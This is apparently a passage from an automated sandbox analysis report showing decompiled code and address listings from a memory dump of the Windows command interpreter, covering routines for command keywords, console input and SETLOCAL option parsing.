                                    															__ecx = __esi;
                                    															__eax = E011E1040(__esi, __edi, __esi);
                                    														}
                                    														__eax = 0;
                                    														__eflags = __edi;
                                    														if(__edi == 0) {
                                    															L195:
                                    															__eax = 0x80070057;
                                    														} else {
                                    															__eflags = __edi - 0x7fffffff;
                                    															if(__edi > 0x7fffffff) {
                                    																goto L195;
                                    															}
                                    														}
                                    														__eflags = __eax;
                                    														if(__eax < 0) {
                                    															L198:
                                    															__edx = 0;
                                    														} else {
                                    															__eax = 0;
                                    															__ecx = __edi;
                                    															__edx = __esi;
                                    															__eflags = __edi;
                                    															if(__edi == 0) {
                                    																L197:
                                    																__eax = 0x80070057;
                                    																goto L198;
                                    															} else {
                                    																while(1) {
                                    																	__eflags =  *__edx - __ax;
                                    																	if( *__edx == __ax) {
                                    																		break;
                                    																	}
                                    																	__edx =  &(__edx[1]);
                                    																	__ecx = __ecx - 1;
                                    																	__eflags = __ecx;
                                    																	if(__ecx != 0) {
                                    																		continue;
                                    																	} else {
                                    																		goto L197;
                                    																	}
                                    																	goto L114;
                                    																}
                                    																__eflags = __ecx;
                                    																if(__ecx == 0) {
                                    																	goto L197;
                                    																} else {
                                    																	__edx = __edi;
                                    																	__edx = __edi - __ecx;
                                    																	__eflags = __edx;
                                    																}
                                    															}
                                    														}
                                    														L114:
                                    														__eflags = __eax;
                                    														if(__eax >= 0) {
                                    															__eax = _v8;
                                    															__esi = __edi;
                                    															__eax =  &(_v8[__edx]);
                                    															__esi = __edi - __edx;
                                    															__eflags = __esi;
                                    															if(__esi == 0) {
                                    																L120:
                                    																__eax = __eax - 2;
                                    															} else {
                                    																__ecx = __esi;
                                    																__edx =  &(__edx[0x3fffffff]);
                                    																__ecx = __esi - __edi;
                                    																__edi = 0x120faa0;
                                    																__edx = __edx + __ecx;
                                    																__edi = 0x120faa0 - __eax;
                                    																__eflags = 0x120faa0;
                                    																while(1) {
                                    																	__eflags = __edx;
                                    																	if(__edx == 0) {
                                    																		break;
                                    																	}
                                    																	__ecx =  *(__edi + __eax) & 0x0000ffff;
                                    																	__eflags = __cx;
                                    																	if(__cx == 0) {
                                    																		break;
                                    																	} else {
                                    																		 *__eax = __cx;
                                    																		__edx = __edx - 1;
                                    																		__eax =  &(__eax[1]);
                                    																		__esi = __esi - 1;
                                    																		__eflags = __esi;
                                    																		if(__esi != 0) {
                                    																			continue;
                                    																		} else {
                                    																			goto L120;
                                    																		}
                                    																	}
                                    																	goto L122;
                                    																}
                                    																__eflags = __esi;
                                    																if(__esi == 0) {
                                    																	goto L120;
                                    																}
                                    															}
                                    															L122:
                                    															__esi = _v8;
                                    															__ecx = 0;
                                    															__eflags = 0;
                                    															 *__eax = __cx;
                                    														}
                                    														__ebx[0x1e] = __esi;
                                    														continue;
                                    													}
                                    												} else {
                                    													__esi = _v12;
                                    													__ecx = __esi;
                                    													__eax = E011E02B0(__ebx, __esi, __edi, __esi);
                                    													__eflags = __eax;
                                    													if(__eax != 0) {
                                    														__eax =  *__esi;
                                    														do {
                                    															_t77 =  &(__eax[0xa]); // 0x14
                                    															__ebx = _t77;
                                    															__eax =  *__ebx;
                                    															_v12 = __ebx;
                                    															__eflags = __eax;
                                    														} while (__eax != 0);
                                    														__ebx = _v20;
                                    														continue;
                                    													} else {
                                    														__edx = 0;
                                    														__ecx = 0;
                                    														__eflags = 0;
                                    														__eax = E011DF300(__eax, 0, 0, __eax);
                                    														break;
                                    													}
                                    												}
                                    												goto L218;
                                    											}
                                    											__eax = _v16;
                                    											_pop(__edi);
                                    											__ebx[0x1a] = _v16;
                                    											__eax = __ebx;
                                    											_pop(__esi);
                                    											_pop(__ebx);
                                    											__esp = __ebp;
                                    											_pop(__ebp);
                                    											return __ebx;
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    				}
                                    				L218:
                                    			}























                                    0x011dda1c
                                    0x011dda1e
                                    0x011dda21
                                    0x011dda23
                                    0x011dda26
                                    0x011dda26
                                    0x011dda29
                                    0x011dda2c
                                    0x011dda2c
                                    0x011dda31
                                    0x011dda33
                                    0x011dda35
                                    0x011dda36
                                    0x011dda39
                                    0x011dda3b
                                    0x011dda40
                                    0x00000000
                                    0x00000000
                                    0x011dda40
                                    0x011dda39
                                    0x011dda1c
                                    0x011dda4f
                                    0x011dda55
                                    0x011dda5b
                                    0x011dda5e
                                    0x011eba31
                                    0x011eba36
                                    0x00000000
                                    0x011dda64
                                    0x011dda66
                                    0x011dda67
                                    0x011dda6c
                                    0x011dda72
                                    0x011dda74
                                    0x011ddb8d
                                    0x011ddb8d
                                    0x011ddb8f
                                    0x011dda7a
                                    0x011dda7a
                                    0x011dda80
                                    0x011dda83
                                    0x011dda88
                                    0x011dda8b
                                    0x011dda8d
                                    0x011dda8d
                                    0x011dda90
                                    0x011dda92
                                    0x011dda98
                                    0x011dda98
                                    0x011dda9b
                                    0x011dda9b
                                    0x011dda9e
                                    0x00000000
                                    0x011ddaa4
                                    0x011ddaa6
                                    0x011ddaac
                                    0x011ddaad
                                    0x011ddaaf
                                    0x011eba90
                                    0x011eba90
                                    0x00000000
                                    0x011ddab5
                                    0x011ddab7
                                    0x011ddabd
                                    0x011ddabe
                                    0x011ddac1
                                    0x00000000
                                    0x011ddac7
                                    0x011ddac7
                                    0x011ddac9
                                    0x011ddace
                                    0x011ddad0
                                    0x011eba41
                                    0x011eba43
                                    0x011eba48
                                    0x011eba4a
                                    0x00000000
                                    0x011eba50
                                    0x011eba56
                                    0x011eba5c
                                    0x011eba5e
                                    0x011eba64
                                    0x011eba66
                                    0x00000000
                                    0x011eba6c
                                    0x011eba6e
                                    0x011eba7e
                                    0x011eba83
                                    0x011eba84
                                    0x011eba86
                                    0x00000000
                                    0x011eba86
                                    0x011eba66
                                    0x011ddad6
                                    0x011ddad6
                                    0x011ddad6
                                    0x011ddad8
                                    0x011ddadd
                                    0x011ddae0
                                    0x011ddae2
                                    0x011ebb26
                                    0x011ebb36
                                    0x011ebb3b
                                    0x011ebb3c
                                    0x011ebb3e
                                    0x011ebb43
                                    0x011ebb43
                                    0x011ebb48
                                    0x011ebb4b
                                    0x011ebb4e
                                    0x00000000
                                    0x011ddae8
                                    0x011ddae8
                                    0x011ddaea
                                    0x011ddaef
                                    0x011ddaef
                                    0x011ddaf2
                                    0x011ddaf6
                                    0x011ddb6d
                                    0x011ddb6f
                                    0x011ddb73
                                    0x011ddb76
                                    0x011ddb78
                                    0x011ddb7c
                                    0x011ddb7f
                                    0x011ddb84
                                    0x011ddb86
                                    0x00000000
                                    0x011ddb88
                                    0x00000000
                                    0x011ddb88
                                    0x011ddaf8
                                    0x011ddaf8
                                    0x011ddafd
                                    0x011ddafe
                                    0x011eba98
                                    0x011eba9d
                                    0x011ebaa2
                                    0x011ebaa8
                                    0x011ebaaa
                                    0x00000000
                                    0x011ebab0
                                    0x011ebab0
                                    0x011ebab5
                                    0x011ebaba
                                    0x011ebabc
                                    0x00000000
                                    0x011ebac2
                                    0x011ebac2
                                    0x011ebac5
                                    0x011ebac7
                                    0x011ebac9
                                    0x011ebac9
                                    0x011ebad9
                                    0x011ebadf
                                    0x011ebae1
                                    0x00000000
                                    0x011ebae7
                                    0x011ebae7
                                    0x011ebaea
                                    0x011ebaec
                                    0x011ebaee
                                    0x011ebaee
                                    0x011ebaf4
                                    0x011ebaf5
                                    0x00000000
                                    0x011ebaf5
                                    0x011ebae1
                                    0x011ebabc
                                    0x011ddb04
                                    0x011ddb07
                                    0x011ddb09
                                    0x011ddb0b
                                    0x011ddb11
                                    0x011ddb11
                                    0x011ddb17
                                    0x011ddb17
                                    0x011ddb1c
                                    0x011ddb22
                                    0x011ddb24
                                    0x011ebb89
                                    0x011ebb89
                                    0x011ebb8e
                                    0x011ebb94
                                    0x00000000
                                    0x011ddb2a
                                    0x011ddb2a
                                    0x011ddb2a
                                    0x011ddb2c
                                    0x011ebaff
                                    0x011ebb01
                                    0x011ebb03
                                    0x011ebb08
                                    0x011ebb0e
                                    0x011ebb10
                                    0x011ebb15
                                    0x011ebb18
                                    0x011ebb58
                                    0x011ebb58
                                    0x011ebb5f
                                    0x011ebb7c
                                    0x00000000
                                    0x011ebb1a
                                    0x011ebb1a
                                    0x011ebb1c
                                    0x00000000
                                    0x011ebb1c
                                    0x011ddb32
                                    0x011ddb32
                                    0x011ddb32
                                    0x011ddb34
                                    0x00000000
                                    0x011ddb3a
                                    0x011ddb3a
                                    0x011ddb40
                                    0x00000000
                                    0x011ddb40
                                    0x011ddb34
                                    0x011ddb2c
                                    0x011ddb24
                                    0x011ddafe
                                    0x011ddaf6
                                    0x011ddae2
                                    0x011ddad0
                                    0x011ddac1
                                    0x011ddaaf
                                    0x00000000
                                    0x011ddb43
                                    0x011ddb43
                                    0x011ddb46
                                    0x011ddb48
                                    0x011ddb48
                                    0x011dda9b
                                    0x011dda92
                                    0x011dda74
                                    0x011ddb50
                                    0x011ddb53
                                    0x011ddb59
                                    0x011ddb5a
                                    0x011ddb5d
                                    0x011ddb5f
                                    0x011ddb60
                                    0x011ddb61
                                    0x011ddb61
                                    0x011ddb63
                                    0x011ddb64
                                    0x011ddb69
                                    0x011ddb6b
                                    0x011ddb6c
                                    0x00000000
                                    0x011ddb6c
                                    0x011dd8f2
                                    0x011dd8f2
                                    0x011dd8f8
                                    0x011dd8fb
                                    0x011dd8fe
                                    0x011dd905
                                    0x011dd906
                                    0x011dd90b
                                    0x011dd90e
                                    0x011dd910
                                    0x011dd912
                                    0x011dd912
                                    0x00000000
                                    0x011dd910
                                    0x011dd8cc
                                    0x011dd8ce
                                    0x011dd8d0
                                    0x011dd8d0
                                    0x011dd8d2
                                    0x00000000
                                    0x011dd8d2
                                    0x011dd8ca
                                    0x011dd8ac
                                    0x011e0502
                                    0x011e050c
                                    0x011e0512
                                    0x011e0515
                                    0x011e0517
                                    0x00000000
                                    0x011e051d
                                    0x011e0527
                                    0x011e052d
                                    0x011e0530
                                    0x011e0532
                                    0x011e0551
                                    0x011e0551
                                    0x011dde5e
                                    0x011dde60
                                    0x011dde66
                                    0x011dde67
                                    0x011dde68
                                    0x011dde6a
                                    0x011ebca8
                                    0x011ebcaa
                                    0x011ebcac
                                    0x011ebcb2
                                    0x011ebcb2
                                    0x011dde72
                                    0x011dde78
                                    0x011dde7a
                                    0x011dde7c
                                    0x011ebcba
                                    0x011ebcbb
                                    0x011ebcc3
                                    0x011ebcc4
                                    0x011ebcca
                                    0x011ebccc
                                    0x011dde82
                                    0x011dde82
                                    0x011dde82
                                    0x011dde84
                                    0x011dde84
                                    0x011dde8b
                                    0x011dde8c
                                    0x011dde91
                                    0x011dde93
                                    0x011ebcd7
                                    0x011ebcdb
                                    0x00000000
                                    0x011dde99
                                    0x011dde9b
                                    0x011dde9d
                                    0x011dde9f
                                    0x011ddea4
                                    0x011ddea9
                                    0x011ddeab
                                    0x011ddee6
                                    0x011ddee6
                                    0x011ddee7
                                    0x011ddee9
                                    0x011ddeea
                                    0x011ddeeb
                                    0x011ddead
                                    0x011ddeaf
                                    0x011ddeb0
                                    0x011ddeb5
                                    0x011ddeba
                                    0x011ddeee
                                    0x011ddef0
                                    0x011ddef2
                                    0x00000000
                                    0x011ddebc
                                    0x011ddebc
                                    0x011ddec1
                                    0x011ddec4
                                    0x011ddec9
                                    0x011ddecb
                                    0x011ebce6
                                    0x011ebcf2
                                    0x011ebcf8
                                    0x011ebcf9
                                    0x011ebcfb
                                    0x011ebd01
                                    0x011ebd03
                                    0x011ebd03
                                    0x011ddfb0
                                    0x011ddfb1
                                    0x011ddfb2
                                    0x011ddfb4
                                    0x011ddfb5
                                    0x011dded1
                                    0x011dded1
                                    0x011dded7
                                    0x011ddede
                                    0x011ddee1
                                    0x00000000
                                    0x011ddee1
                                    0x011ddecb
                                    0x011ddeba
                                    0x011ddeab
                                    0x011e0534
                                    0x011e053e
                                    0x011e0544
                                    0x011e0547
                                    0x011e0549
                                    0x00000000
                                    0x011e054b
                                    0x011e054b
                                    0x011ded82
                                    0x011ded83
                                    0x011ded85
                                    0x011ded88
                                    0x011ded89
                                    0x011ded8a
                                    0x011ded8d
                                    0x011ded94
                                    0x011ded95
                                    0x011ded95
                                    0x011ded97
                                    0x011ded9f
                                    0x011deda1
                                    0x011deda4
                                    0x011deda4
                                    0x011deda9
                                    0x011dedab
                                    0x00000000
                                    0x00000000
                                    0x011dedad
                                    0x011dedb2
                                    0x011dedb7
                                    0x011dedbc
                                    0x011dede9
                                    0x011dedec
                                    0x011dedf2
                                    0x011dedf4
                                    0x011ec0ad
                                    0x011ec0b0
                                    0x011ec0b0
                                    0x011ec0b3
                                    0x011ec0b6
                                    0x011ec0b6
                                    0x011ec0bb
                                    0x011ec0bf
                                    0x011ec0bf
                                    0x011dedfa
                                    0x011dee02
                                    0x011dee04
                                    0x011dee07
                                    0x011dee09
                                    0x011ec0f7
                                    0x011ec103
                                    0x011ec109
                                    0x011ec10a
                                    0x011ec111
                                    0x011ec117
                                    0x011ec117
                                    0x011defe1
                                    0x011defe1
                                    0x011defe3
                                    0x011defea
                                    0x011defef
                                    0x011ec121
                                    0x011ec123
                                    0x011ec125
                                    0x011ec125
                                    0x011deff5
                                    0x011deff7
                                    0x011deff8
                                    0x011deff9
                                    0x011deffa
                                    0x011deffb
                                    0x011dee0f
                                    0x011dee0f
                                    0x011dee12
                                    0x011dee14
                                    0x011ec0c7
                                    0x011ec0c9
                                    0x011ec0cb
                                    0x011ec0cb
                                    0x011dee1a
                                    0x011dee1c
                                    0x011dee1e
                                    0x011ec0d5
                                    0x011ec0d5
                                    0x011dee24
                                    0x011dee24
                                    0x011dee2a
                                    0x00000000
                                    0x00000000
                                    0x011dee2a
                                    0x011dee30
                                    0x011dee32
                                    0x011ec0f0
                                    0x011ec0f0
                                    0x011dee38
                                    0x011dee38
                                    0x011dee3a
                                    0x011dee3c
                                    0x011dee3e
                                    0x011dee40
                                    0x011ec0eb
                                    0x011ec0eb
                                    0x00000000
                                    0x011dee46
                                    0x011dee46
                                    0x011dee46
                                    0x011dee49
                                    0x00000000
                                    0x00000000
                                    0x011ec0df
                                    0x011ec0e2
                                    0x011ec0e2
                                    0x011ec0e5
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ec0e5
                                    0x011dee4f
                                    0x011dee51
                                    0x00000000
                                    0x011dee57
                                    0x011dee57
                                    0x011dee59
                                    0x011dee59
                                    0x011dee59
                                    0x011dee51
                                    0x011dee40
                                    0x011dee5b
                                    0x011dee5b
                                    0x011dee5d
                                    0x011dee5f
                                    0x011dee62
                                    0x011dee64
                                    0x011dee67
                                    0x011dee67
                                    0x011dee69
                                    0x011dee99
                                    0x011dee99
                                    0x011dee6b
                                    0x011dee6b
                                    0x011dee6d
                                    0x011dee73
                                    0x011dee75
                                    0x011dee7a
                                    0x011dee7c
                                    0x011dee7c
                                    0x011dee80
                                    0x011dee80
                                    0x011dee82
                                    0x00000000
                                    0x00000000
                                    0x011dee84
                                    0x011dee88
                                    0x011dee8b
                                    0x00000000
                                    0x011dee8d
                                    0x011dee8d
                                    0x011dee90
                                    0x011dee91
                                    0x011dee94
                                    0x011dee94
                                    0x011dee97
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dee97
                                    0x00000000
                                    0x011dee8b
                                    0x011dee9e
                                    0x011deea0
                                    0x00000000
                                    0x00000000
                                    0x011deea0
                                    0x011deea2
                                    0x011deea2
                                    0x011deea5
                                    0x011deea5
                                    0x011deea7
                                    0x011deea7
                                    0x011deeaa
                                    0x00000000
                                    0x011deeaa
                                    0x011dedbe
                                    0x011dedbe
                                    0x011dedc1
                                    0x011dedc3
                                    0x011dedc8
                                    0x011dedca
                                    0x011deeb2
                                    0x011deeb4
                                    0x011deeb4
                                    0x011deeb4
                                    0x011deeb7
                                    0x011deeb9
                                    0x011deebc
                                    0x011deebc
                                    0x011deec0
                                    0x00000000
                                    0x011dedd0
                                    0x011dedd1
                                    0x011dedd3
                                    0x011dedd3
                                    0x011dedd5
                                    0x00000000
                                    0x011dedd5
                                    0x011dedca
                                    0x00000000
                                    0x011dedbc
                                    0x011dedda
                                    0x011deddd
                                    0x011dedde
                                    0x011dede1
                                    0x011dede3
                                    0x011dede4
                                    0x011dede5
                                    0x011dede7
                                    0x011dede8
                                    0x011dede8
                                    0x011e0549
                                    0x011e0532
                                    0x011e0517
                                    0x011e04fc
                                    0x011e04e1
                                    0x011e04c6
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID: FOR$FOR/?$IF/?$REM$REM/?
                                    • API String ID: 2081463915-3874590324
                                    • Opcode ID: 611c1124308175d04c15a5d01d8614793ad6044b52ab7373355629c5de85a2b9
                                    • Instruction ID: 8eb187385da68ff4cc7cd007489d28d1ed612b1a834babaa0ba62ce91a1e800a
                                    • Opcode Fuzzy Hash: 611c1124308175d04c15a5d01d8614793ad6044b52ab7373355629c5de85a2b9
                                    • Instruction Fuzzy Hash: A131AF247807128BEF3E6BF9B81D36A26D09F04749F48802AF642952C5DFA091C6C766
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 67%
                                    			E011F474C(void* __ebx, void* __ecx, char* __edx, void* __edi, void* __esi, void* __eflags) {
                                    				signed int _v8;
                                    				char _v2060;
                                    				char _v2061;
                                    				char _v2062;
                                    				signed int _v2068;
                                    				long _v2072;
                                    				long _v2076;
                                    				void* _v2080;
                                    				intOrPtr _v2088;
                                    				signed int _t36;
                                    				long* _t38;
                                    				void* _t40;
                                    				signed int _t43;
                                    				long _t44;
                                    				wchar_t* _t45;
                                    				void* _t48;
                                    				void* _t49;
                                    				void* _t53;
                                    				void* _t58;
                                    				signed int _t60;
                                    				void* _t61;
                                    				intOrPtr _t63;
                                    				wchar_t* _t70;
                                    				long _t71;
                                    				wchar_t* _t72;
                                    				wchar_t* _t74;
                                    				void* _t77;
                                    				void* _t78;
                                    				intOrPtr _t89;
                                    				void* _t102;
                                    				long _t103;
                                    				wchar_t* _t104;
                                    				void* _t106;
                                    				wchar_t* _t107;
                                    				signed int _t108;
                                    
                                    				_t99 = __edx;
                                    				_t36 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t36 ^ _t108;
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_push(__edi);
                                    				_v2061 = 0;
                                    				_v2062 = 0;
                                    				_t38 = E011DDF40(__ecx);
                                    				if(_t38 == 0) {
                                    					L3:
                                    					_t40 = 1;
                                    					goto L4;
                                    				} else {
                                    					_t82 = _t38;
                                    					_t107 = E011E2430(_t38);
                                    					_t43 =  *_t107 & 0x0000ffff;
                                    					if(_t43 != 0) {
                                    						_t103 = 0x22;
                                    						if(_t43 == _t103) {
                                    							_t5 =  &(_t107[0]); // 0x2
                                    							_t107 = E011E2430(_t5);
                                    							_t74 = wcsrchr(_t107, _t103);
                                    							if(_t74 != 0) {
                                    								 *_t74 = 0;
                                    							}
                                    						}
                                    						_t44 = 0x3d;
                                    						_t45 = wcschr(_t107, _t44);
                                    						_pop(_t82);
                                    						if(_t45 == 0) {
                                    							goto L2;
                                    						} else {
                                    							 *_t45 = 0;
                                    							_t6 =  &(_t45[0]); // 0x2
                                    							_t82 = _t6;
                                    							_t104 = E011E2430(_t6);
                                    							_t48 = 0x22;
                                    							if( *_t104 == _t48) {
                                    								_t7 =  &(_t104[0]); // 0x2
                                    								_t70 = E011E2430(_t7);
                                    								_t104 = _t70;
                                    								_t71 = 0x22;
                                    								_t72 = wcsrchr(_t104, _t71);
                                    								_pop(_t82);
                                    								if(_t72 != 0) {
                                    									_t82 = 0;
                                    									 *_t72 = 0;
                                    								}
                                    							}
                                    							_t49 = 0x3d;
                                    							if( *_t104 == _t49) {
                                    								goto L2;
                                    							} else {
                                    								_t78 = GetStdHandle(0xfffffff5);
                                    								if(GetConsoleMode(_t78,  &_v2072) != 0) {
                                    									_v2061 = 1;
                                    									SetConsoleMode(_t78, _v2072 | 0x00000001);
                                    								}
                                    								_t53 = GetStdHandle(0xfffffff6);
                                    								_t87 =  &_v2076;
                                    								_v2080 = _t53;
                                    								if(GetConsoleMode(_t53,  &_v2076) != 0) {
                                    									_t87 = _v2076 | 0x00000007;
                                    									_v2062 = 1;
                                    									SetConsoleMode(_v2080, _v2076 | 0x00000007);
                                    								}
                                    								E011DC108(_t87, 0x2371, 1, _t104);
                                    								_v2060 = 0;
                                    								_t58 = GetStdHandle(0xfffffff6);
                                    								_t99 =  &_v2060;
                                    								_t88 = _t58;
                                    								if(E011F3B11(_t58,  &_v2060, 0x3ff,  &_v2068) == 0) {
                                    									L23:
                                    									_t60 = 0;
                                    									_v2068 = 0;
                                    								} else {
                                    									_t60 = _v2068;
                                    									if(_t60 == 0) {
                                    										goto L23;
                                    									} else {
                                    										_t88 = _t108 + _t60 * 2 - 0x80a;
                                    										while( *_t88 < 0x20) {
                                    											_t60 = _t60 - 1;
                                    											_t88 = _t88 - 2;
                                    											_v2068 = _t60;
                                    											if(_t60 != 0) {
                                    												continue;
                                    											} else {
                                    											}
                                    											goto L24;
                                    										}
                                    									}
                                    								}
                                    								L24:
                                    								if(_v2061 != 0) {
                                    									SetConsoleMode(_t78, _v2072);
                                    									_t60 = _v2068;
                                    								}
                                    								if(_v2062 != 0) {
                                    									SetConsoleMode(_v2080, _v2076);
                                    									_t60 = _v2068;
                                    								}
                                    								if(_t60 == 0) {
                                    									goto L3;
                                    								} else {
                                    									_t61 = _t60 + _t60;
                                    									if(_t61 >= 0x800) {
                                    										E011E711D(_t61, _t78, _t88, _t99, _t104, _t107);
                                    										asm("int3");
                                    										asm("int3");
                                    										asm("int3");
                                    										asm("int3");
                                    										asm("int3");
                                    										asm("int3");
                                    										asm("int3");
                                    										asm("int3");
                                    										asm("int3");
                                    										asm("int3");
                                    										asm("int3");
                                    										asm("int3");
                                    										asm("int3");
                                    										_push(_t108);
                                    										_t89 = _v2088;
                                    										if( *0x11fd5fc == 2) {
                                    											_t63 = E011F46A5(_t89, 0);
                                    											L35:
                                    											 *0x120b8b0 = _t63;
                                    											return _t63;
                                    										}
                                    										_t63 = E011F46A5(_t89, 0);
                                    										if(_t63 != 0) {
                                    											goto L35;
                                    										}
                                    										return _t63;
                                    									} else {
                                    										_t99 =  &_v2060;
                                    										 *((short*)(_t108 + _t61 - 0x808)) = 0;
                                    										_t40 = E011E3A50(_t107,  &_v2060);
                                    										L4:
                                    										_pop(_t102);
                                    										_pop(_t106);
                                    										_pop(_t77);
                                    										return E011E6FD0(_t40, _t77, _v8 ^ _t108, _t99, _t102, _t106);
                                    									}
                                    								}
                                    							}
                                    						}
                                    					} else {
                                    						L2:
                                    						_push(0);
                                    						_push(0x232a);
                                    						E011DC5A2(_t82);
                                    						goto L3;
                                    					}
                                    				}
                                    			}







































                                    APIs
                                      • Part of subcall function 011E2430: iswspace.MSVCRT ref: 011E2440
                                    • wcsrchr.MSVCRT ref: 011F47C1
                                    • wcschr.MSVCRT ref: 011F47D7
                                    • wcsrchr.MSVCRT ref: 011F4809
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 011F4828
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4838
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4854
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011F485C
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4870
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F4891
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 011F48BE
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4914
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F4935
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
                                    • String ID:
                                    • API String ID: 4166807220-0
                                    • Opcode ID: feb92c1057ab0264ce8de76f445391a2f9bb90ab11888967d501e019172ba27e
                                    • Instruction ID: cf5ea08ca5dbc6c56bd1edcd91df0f1f0d025a92a1e8be328efb88a7cff37b97
                                    • Opcode Fuzzy Hash: feb92c1057ab0264ce8de76f445391a2f9bb90ab11888967d501e019172ba27e
                                    • Instruction Fuzzy Hash: F351D7316002199AEF39EB78EC18BBA77F8FF14314F0485ADE645C2580EF708985CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 20%
                                    			E011DC430() {
                                    				intOrPtr _v8;
                                    				void* __ecx;
                                    				intOrPtr _t21;
                                    				char _t22;
                                    				intOrPtr _t25;
                                    				intOrPtr _t33;
                                    				intOrPtr _t37;
                                    				char _t40;
                                    				void* _t47;
                                    				intOrPtr* _t50;
                                    				void* _t53;
                                    				intOrPtr _t54;
                                    				void* _t65;
                                    				void* _t68;
                                    				void* _t73;
                                    				intOrPtr* _t77;
                                    				intOrPtr* _t78;
                                    				void* _t83;
                                    
                                    				_t46 = _t83;
                                    				_push(_t47);
                                    				_push(_t47);
                                    				_v8 =  *((intOrPtr*)(_t83 + 4));
                                    				_t21 =  *0x1213cc4;
                                    				if(_t21 == 0) {
                                    					L19:
                                    					_t22 = 0;
                                    				} else {
                                    					if( *((intOrPtr*)(_t21 + 0x14)) >= 0x20) {
                                    						_push(0);
                                    						_push(0x4000271c);
                                    						E011DC5A2(_t47);
                                    						goto L24;
                                    					} else {
                                    						_t50 =  *0x1213cb8;
                                    						if(_t50 == 0) {
                                    							_t50 = 0x1213ab0;
                                    						}
                                    						_t68 = _t50 + 2;
                                    						do {
                                    							_t25 =  *_t50;
                                    							_t50 = _t50 + 2;
                                    						} while (_t25 != 0);
                                    						_t73 = (_t50 - _t68 >> 1) + 1;
                                    						_t77 = HeapAlloc(GetProcessHeap(), 8, 0xc);
                                    						if(_t77 == 0) {
                                    							L24:
                                    							_t22 = 1;
                                    						} else {
                                    							_t53 = HeapAlloc(GetProcessHeap(), 8, _t73 + _t73);
                                    							 *_t77 = _t53;
                                    							if(_t53 == 0) {
                                    								goto L24;
                                    							} else {
                                    								_t31 =  *0x1213cb8;
                                    								if( *0x1213cb8 == 0) {
                                    									_t31 = 0x1213ab0;
                                    								}
                                    								E011E1040(_t53, _t73, _t31);
                                    								_t33 = E011E3B2C(_t53);
                                    								 *((intOrPtr*)(_t77 + 4)) = _t33;
                                    								if(_t33 == 0) {
                                    									goto L24;
                                    								} else {
                                    									_t54 =  *0x1213cc4;
                                    									 *((char*)(_t77 + 8)) =  *0x1213cc9;
                                    									 *((char*)(_t77 + 9)) =  *0x1213cc8;
                                    									 *((intOrPtr*)(_t54 + 0x90 +  *(_t54 + 0x14) * 4)) = _t77;
                                    									_t37 =  *0x1213cd8;
                                    									 *(_t54 + 0x14) =  *(_t54 + 0x14) + 1;
                                    									 *((intOrPtr*)(_t54 + 0xc)) = _t37;
                                    									if( *((intOrPtr*)(_t54 + 0x10)) < _t37) {
                                    										 *((intOrPtr*)(_t54 + 0x10)) = _t37;
                                    									}
                                    									_t78 = E011DEA40( *((intOrPtr*)( *((intOrPtr*)(_t46 + 8)) + 0x3c)), 0, 0);
                                    									_t40 = 0;
                                    									 *0x120b8b0 = 0;
                                    									while( *_t78 != _t40) {
                                    										__imp___wcsicmp(_t78, L"ENABLEEXTENSIONS");
                                    										if(_t40 != 0) {
                                    											__imp___wcsicmp(_t78, L"DISABLEEXTENSIONS");
                                    											if(_t40 == 0) {
                                    												 *0x1213cc9 = 0;
                                    												goto L15;
                                    											} else {
                                    												__imp___wcsicmp(_t78, L"ENABLEDELAYEDEXPANSION");
                                    												if(_t40 != 0) {
                                    													__imp___wcsicmp(L"DISABLEDELAYEDEXPANSION");
                                    													_t65 = _t78;
                                    													if(_t40 != 0) {
                                    														if( *_t78 == 0) {
                                    															goto L15;
                                    														} else {
                                    															_push(0);
                                    															_push(0x400023a6);
                                    															E011DC5A2(_t65);
                                    															_t22 = 1;
                                    															 *0x120b8b0 = 1;
                                    														}
                                    													} else {
                                    														 *0x1213cc8 = _t40;
                                    														goto L15;
                                    													}
                                    												} else {
                                    													 *0x1213cc8 = 1;
                                    													goto L15;
                                    												}
                                    											}
                                    										} else {
                                    											 *0x1213cc9 = 1;
                                    											L15:
                                    											_t78 = E011DD7E6(_t78);
                                    											_t40 = 0;
                                    											continue;
                                    										}
                                    										goto L20;
                                    									}
                                    									goto L19;
                                    								}
                                    							}
                                    						}
                                    					}
                                    				}
                                    				L20:
                                    				return _t22;
                                    			}





















                                    0x011dc45a
                                    0x011dc58e
                                    0x011dc596
